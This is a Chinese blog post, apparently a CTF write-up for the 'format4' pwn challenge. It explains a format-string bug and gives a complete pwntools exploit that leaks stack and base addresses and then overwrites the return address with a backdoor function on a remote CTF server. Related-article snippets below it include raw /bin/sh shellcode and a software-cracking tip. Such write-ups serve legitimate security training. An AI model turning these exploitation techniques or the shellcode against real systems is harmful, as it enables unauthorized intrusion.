ROIS冬令营——format4

最新推荐文章于 2024-07-17 15:00:16 发布
最新推荐文章于 2024-07-17 15:00:16 发布
阅读量94 收藏
点赞数
分类专栏: pwn 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129172450
版权

题目自取

链接:https://pan.baidu.com/s/1ASEBlVsI-UBRsjs7H3xPHw?pwd=4p8y 
提取码:4p8y

开始:

有NX保护,写不了shellcode
Full relro,说明改不了got表
有pie保护,说明可能需要泄露程序的基地址

 

 

 

IDA这里显示有后门函数,没有栈溢出,但是有格式化字符串漏洞。

看一下栈的情况:

大致思路是修改返回地址为后门函数,也就是 把rbp的下一个地址(main+46)处修改为backdoor的地址。
我们可以观察到0x7fffffffdec8这块地址指向的是返回地址的下一地址,我们可以泄露这个地址再减去0x8,就可以得到返回地址处的地址,在这里也就是0x7fffffffdda8。且距离第一个字符写入的地址dd70处只有0x10的距离,完全可以将dda0这个参数写入dd80处的内存。再配合格式化字符串漏洞,可以把返回地址处的内容(main+46)修改为backdoor的地址。

泄露栈的地址可以通过泄露0x7fffffffddc8处的main地址,再根据base=main-0xA0B(IDA显示程序main地址)即可得到程序的基地址

from pwn import *
elf = ELF('./format4')
io=remote("81.68.85.214",8012)
from LibcSearcher import *
context(os="linux", arch="amd64",log_level="debug")
io.recvuntil(b'ing.....')
io.recvline()
payload=b'%15$p'
io.send(payload)
main_addr=int(io.recv(14),16)-46
base=main_addr-0xA0B
backdoor_addr=0x951+base
print(hex(backdoor_addr))
t=backdoor_addr&0xffff
io.sendlineafter("anything else to say?\n",b"y")
io.recv()

payload=b'%14$p'
io.send(payload)
io.recvline()
stack_addr=int(io.recv(14),16)-0x8
print("修改数据开始")

io.sendlineafter("anything else to say?\n",b"y")

payload=b'%'+str(t).encode('utf-8')+b'c'+b'%10$hn'
payload=payload.ljust(0x10,b'a')+p64(stack_addr)


io.sendlineafter("leave something.....\n",payload)

io.sendlineafter("anything else to say?\n",b"n")
io.interactive()

这里要说明的是返回地址的时候返回的是base+0x951,是0x951而不是0x950,应该是栈对齐的原因,如果用ROPgadget拿到ret的地址,在返回后门函数前加一个ret应该也能够解决问题。但是很奇怪打远程的时候用ret不行,但是过一段时间回来再打又可以了。很奇怪

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Python,OpenCV制作图像Mask——截取ROIs及构建透明的叠加层
qq_40985985的博客
07-04 3215
这篇博客将介绍如何使用OpenCV制作Mask图像掩码。使用位运算和图像掩码让我们只关注图像中感兴趣的部分。截取出任意区域的ROIs
软路由rois
07-27
安装于破解方法:2个ISO分别刻盘(虚拟机无视该步骤), 先安装官方原版mikrotik-5.24.iso, 再用破解光盘启动HunterTik-v2.3.1.iso, 一路回车,搞定。。。... (如果以前是安装过HunterTik-v2.3.1.iso破解的(5.22-...
ROIS冬令营———canary
fzucaicai的博客
02-19 89
于是结合前面的vuln栈溢出漏洞,我们可以覆盖返回地址为win函数的地址,从而完成跳转到win函数,因为v3是在栈上,且读入了flag,那么我们的思路就是通过格式化字符串漏洞去泄露出flag。如果只是单纯根据IDA给的栈位置v3位置位于esp+0x1b的话,其实是错的,可以很明显看到esp实际上一直在变动,所以通过综合判断,应该开始于第是十个参数,那接下来就是泄露啦,过程有点繁琐,就是不停地给v2读入%k$p获得对应的字符串。不过很不走运,在IDA里,并没有找到/bin/sh字符串,这希望也破灭了。
ROIS冬令营——database_in
fzucaicai的博客
02-21 100
shellcode:"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"(菜得要死,直接网上找,不要学我)拿到canary和rbp后,就可以通过栈溢出执行shellcode啦,但是我们注意到,由于shellcode太长,栈溢出太短,因此我们可以把shellcode放在栈中,在溢出的返回地址处写入返回到shellcode的地方。个人习惯先checksec再IDA。
ROIS冬令营——database
fzucaicai的博客
02-20 73
函数的意思是从标准输入中读入最多32个字节的数据,从标准输入读取一个字节,如果小于等于 0 则说明读取失败,返回 -1(0xFFFFFFFF).如果读取到换行符 ,将换行符替换为字符串0,则返回-1,就会停止。' 意思就是分两次执行,如输入 echo hello world && cat flag,它的意思就是执行system('echo hello world') system('cat flag')变量中的字符串作为参数,将它们合并成一个新的字符串,最后将结果存储到。
ROIS冬令营——format3(把bss段数据移至栈上)
fzucaicai的博客
02-19 66
漏洞是非常明显的,有格式化字符串漏洞,就是要改key的值为2023,但是发现key的值不在栈上,因此我们不能直接用输入%n来修改栈上的数据,而是要把key这个数据的地址放到栈中,然后进行修改。可以看到key变量在bss区,地址是0x60208c。那么我们的思路就是把bss段key的地址移至栈上,然后修改key的值。链接:https://pan.baidu.com/s/10SyKe0s9cyY6kiblH2fs8Q?先往第八个参数写入数据2023(因为我们将把key的地址放在第8个参数,rsp是第6个参数)
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1201
2021年暑假参加集训,在buuctf上做的几道题的writeup.
cuda——nms
xiaohu的博客
08-07 777
cuda——nms
Ubuntu安装OpenCV4记录
zhangrelay的专栏
11-20 3158
参考:https://blog.csdn.net/new_delete_/article/details/84797041 在Ubuntu 18.04安装OpenCV 4.1.2版本: 安装依赖: sudo apt-get install build-essential libgtk2.0-dev libgtk-3-dev libavcodec-dev libavformat-dev l...
YOLOv4中的tricks概念总结——Bag of freebies
Clichong
06-17 1400
以下内容是对YOLOv4总结出的Bag of freebies进行一个汇总记录: 通常,传统的目标检测器是离线训练的。因此,研究人员总是喜欢利用这一优势,开发更好的训练方法,使目标检测器在不增加推理代价的情况下获得更好的准确率。我们把这些只会改变培训策略或只会增加培训成本的方法称为“Bag of freebies”。 以下我对这些方法进行一个简要的汇总与介绍: 1.pixel-wise调整 满足Bag of freebies定义的目标检测方法经常采用的是数据扩增。数据增强的目的是增加输入图像的可变性,使所设
Measure_ROIs:ImageJ宏
05-08
设置了“测量投资回报率”宏 •这组宏用于定义图像上的关注区域并测量其特征(区域,强度...)。 工作流程分为两部分。 它允许您通过三种不同的方法为给定通道上的所有图像生成感兴趣的特征的归类ROI。...
roisin-spring:用于分析临床数据的 Roisin Web 应用程序
06-05
Roisin Spring 是一个专门设计用于分析临床数据的Web应用程序,它基于Java技术栈构建,能够帮助用户处理、存储和分析医疗领域的大数据。这个项目的核心是Spring框架,一个广泛使用的Java企业级应用开发框架,提供了...
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
02-21
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
ENVI遥感图像处理实验二——图像常规处理2.pdf
04-04
4. 在“Select Spatial Subset”对话框中,通过“Subset By Image”定义裁剪区域,可以输入行列数或直接拖动红色矩形框。 5. 完成裁剪区域设置后,确认输出路径和文件名,保存裁剪结果。 - **不规则分幅裁剪**:...
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 797
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 948
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 770
计算机网络技术期末复习
最新发布
CWPIN21的博客
07-17 1013
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。
ROIS[r][4]
05-31
ROIS[r]通常用于目标检测算法中的区域兴趣(ROI)池化操作。...ROIS[r]用于存储所有区域兴趣的坐标信息,其中r表示区域兴趣的数量,每个区域兴趣由4个坐标值来确定其位置,分别为左上角的x,y坐标和右下角的x,y坐标。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值